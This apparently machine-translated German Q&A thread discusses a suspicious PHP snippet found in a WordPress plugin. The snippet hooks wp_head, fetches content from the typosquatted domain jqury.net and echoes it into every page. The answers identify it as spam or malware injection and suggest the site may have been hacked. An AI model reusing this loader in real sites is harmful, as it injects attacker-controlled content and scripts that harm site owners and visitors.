it-swarm.com.de

Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?

Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_Host']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
17
Sofia Rose

Es wird ein Markup-Block geladen, der Spam enthält (ich habe überlegt, einen Teil des Quellcodes zu veröffentlichen, möchte aber nicht für den Inhalt werben). Dies ist eine sehr falsche Schreibweise des von verwendeten domain-- http://jquery.com/-- jQuery, eine seriöse und beliebte Javascript-Bibliothek und eine, die WordPress in den Core integriert. Ich denke, die Idee ist es, diese Bibliothek zu laden, während tatsächlich etwas ganz anderes geladen wird.

Auf andere Weise wird versucht, jQuery zu laden. Beachten Sie den Variablennamen $jquery.

Möglicherweise wird auch versucht, schädliche Skripts zu laden. Ich habe nicht nachgesehen. Ich würde es definitiv als gefährlich bezeichnen, zumal sich der Inhalt dieser Seite jederzeit ändern kann, wenn die Domänencontroller dies wünschen.

Im besten Fall wird Ihre Website beschädigt, da Suchmaschinen auf Websites herabsehen, die Spam verbreiten.

Benutze es nicht. Es ist weder für Sie noch für andere im Internet von Vorteil, außer für die Personen, die die Site betreiben. Wenn Sie dies auf einer seriösen Site gefunden haben, melden Sie es ihnen.

16
s_ha_dum

Ja, es ist ein gefährlicher Code, der Inhalte von einer Spam-Site lädt.

Sie haben das Plugin nicht benannt, aber wenn Sie diesen Code gefunden haben, nachdem er auf Ihrer Website installiert wurde, ist es möglich, dass der Plugin-Code nicht so vom Entwickler stammt, sondern erst nach der Installation gehackt wurde. In diesem Fall finden Sie den schädlichen Code möglicherweise auf mehr Websites als nur in diesem Plugin.

Überprüfen Sie den heruntergeladenen Plugin-Code, von dem Sie das Plugin ursprünglich bezogen haben, und prüfen Sie, ob dieser schädliche Code ursprünglich vorhanden war. Wenn nicht, wurde Ihre Website gehackt. Wenn Sie feststellen, dass dies der Fall ist, lesen Sie diesen Artikel aus dem Codex .

7
Ben Miller